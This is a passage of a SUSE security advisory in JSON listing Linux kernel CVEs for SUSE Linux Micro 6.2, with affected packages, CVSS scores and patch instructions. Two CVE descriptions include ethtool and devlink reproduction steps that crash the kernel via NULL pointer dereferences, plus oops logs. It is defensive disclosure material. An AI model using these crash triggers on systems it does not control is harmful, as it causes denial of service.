"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22992",
"url": "https://www.suse.com/security/cve/CVE-2026-22992"
},
{
"category": "external",
"summary": "SUSE Bug 1257218 for CVE-2026-22992",
"url": "https://bugzilla.suse.com/1257218"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22992"
},
{
"cve": "CVE-2026-22993",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22993"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nidpf: Fix RSS LUT NULL ptr issue after soft reset\n\nDuring soft reset, the RSS LUT is freed and not restored unless the\ninterface is up. If an ethtool command that accesses the rss lut is\nattempted immediately after reset, it will result in NULL ptr\ndereference. Also, there is no need to reset the rss lut if the soft reset\ndoes not involve queue count change.\n\nAfter soft reset, set the RSS LUT to default values based on the updated\nqueue count only if the reset was a result of a queue count change and\nthe LUT was not configured by the user. In all other cases, don\u0027t touch\nthe LUT.\n\nSteps to reproduce:\n\n** Bring the interface down (if up)\nifconfig eth1 down\n\n** update the queue count (eg., 27-\u003e20)\nethtool -L eth1 combined 20\n\n** display the RSS LUT\nethtool -x eth1\n\n[82375.558338] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[82375.558373] #PF: supervisor read access in kernel mode\n[82375.558391] #PF: error_code(0x0000) - not-present page\n[82375.558408] PGD 0 P4D 0\n[82375.558421] Oops: Oops: 0000 [#1] SMP NOPTI\n\u003csnip\u003e\n[82375.558516] RIP: 0010:idpf_get_rxfh+0x108/0x150 [idpf]\n[82375.558786] Call Trace:\n[82375.558793] \u003cTASK\u003e\n[82375.558804] rss_prepare.isra.0+0x187/0x2a0\n[82375.558827] rss_prepare_data+0x3a/0x50\n[82375.558845] ethnl_default_doit+0x13d/0x3e0\n[82375.558863] genl_family_rcv_msg_doit+0x11f/0x180\n[82375.558886] genl_rcv_msg+0x1ad/0x2b0\n[82375.558902] ? __pfx_ethnl_default_doit+0x10/0x10\n[82375.558920] ? __pfx_genl_rcv_msg+0x10/0x10\n[82375.558937] netlink_rcv_skb+0x58/0x100\n[82375.558957] genl_rcv+0x2c/0x50\n[82375.558971] netlink_unicast+0x289/0x3e0\n[82375.558988] netlink_sendmsg+0x215/0x440\n[82375.559005] __sys_sendto+0x234/0x240\n[82375.559555] __x64_sys_sendto+0x28/0x30\n[82375.560068] x64_sys_call+0x1909/0x1da0\n[82375.560576] do_syscall_64+0x7a/0xfa0\n[82375.561076] ? clear_bhb_loop+0x60/0xb0\n[82375.561567] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\u003csnip\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22993",
"url": "https://www.suse.com/security/cve/CVE-2026-22993"
},
{
"category": "external",
"summary": "SUSE Bug 1257180 for CVE-2026-22993",
"url": "https://bugzilla.suse.com/1257180"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22993"
},
{
"cve": "CVE-2026-22996",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22996"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv\n\nmlx5e_priv is an unstable structure that can be memset(0) if profile\nattaching fails, mlx5e_priv in mlx5e_dev devlink private is used to\nreference the netdev and mdev associated with that struct. Instead,\nstore netdev directly into mlx5e_dev and get mdev from the containing\nmlx5_adev aux device structure.\n\nThis fixes a kernel oops in mlx5e_remove when switchdev mode fails due\nto change profile failure.\n\n$ devlink dev eswitch set pci/0000:00:03.0 mode switchdev\nError: mlx5_core: Failed setting eswitch to offloads.\ndmesg:\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: new profile init failed, -12\nworkqueue: Failed to create a rescuer kthread for wq \"mlx5e\": -EINTR\nmlx5_core 0012:03:00.1: mlx5e_netdev_init_profile:6214:(pid 37199): mlx5e_priv_init failed, err=-12\nmlx5_core 0012:03:00.1 gpu3rdma1: mlx5e_netdev_change_profile: failed to rollback to orig profile, -12\n\n$ devlink dev reload pci/0000:00:03.0 ==\u003e oops\n\nBUG: kernel NULL pointer dereference, address: 0000000000000520\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\nPGD 0 P4D 0\nOops: Oops: 0000 [#1] SMP NOPTI\nCPU: 3 UID: 0 PID: 521 Comm: devlink Not tainted 6.18.0-rc5+ #117 PREEMPT(voluntary)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-2.fc40 04/01/2014\nRIP: 0010:mlx5e_remove+0x68/0x130\nRSP: 0018:ffffc900034838f0 EFLAGS: 00010246\nRAX: ffff88810283c380 RBX: ffff888101874400 RCX: ffffffff826ffc45\nRDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000\nRBP: ffff888102d789c0 R08: ffff8881007137f0 R09: ffff888100264e10\nR10: ffffc90003483898 R11: ffffc900034838a0 R12: ffff888100d261a0\nR13: ffff888100d261a0 R14: ffff8881018749a0 R15: ffff888101874400\nFS: 00007f8565fea740(0000) GS:ffff88856a759000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000000000520 CR3: 000000010b11a004 CR4: 0000000000370ef0\nCall Trace:\n \u003cTASK\u003e\n device_release_driver_internal+0x19c/0x200\n bus_remove_device+0xc6/0x130\n device_del+0x160/0x3d0\n ? devl_param_driverinit_value_get+0x2d/0x90\n mlx5_detach_device+0x89/0xe0\n mlx5_unload_one_devl_locked+0x3a/0x70\n mlx5_devlink_reload_down+0xc8/0x220\n devlink_reload+0x7d/0x260\n devlink_nl_reload_doit+0x45b/0x5a0\n genl_family_rcv_msg_doit+0xe8/0x140",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22996",
"url": "https://www.suse.com/security/cve/CVE-2026-22996"
},
{
"category": "external",
"summary": "SUSE Bug 1257203 for CVE-2026-22996",
"url": "https://bugzilla.suse.com/1257203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-22996"
},
{
"cve": "CVE-2026-22997",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22997"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: j1939_xtp_rx_rts_session_active(): deactivate session upon receiving the second rts\n\nSince j1939_session_deactivate_activate_next() in j1939_tp_rxtimer() is\ncalled only when the timer is enabled, we need to call\nj1939_session_deactivate_activate_next() if we cancelled the timer.\nOtherwise, refcount for j1939_session leaks, which will later appear as\n\n| unregister_netdevice: waiting for vcan0 to become free. Usage count = 2.\n\nproblem.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
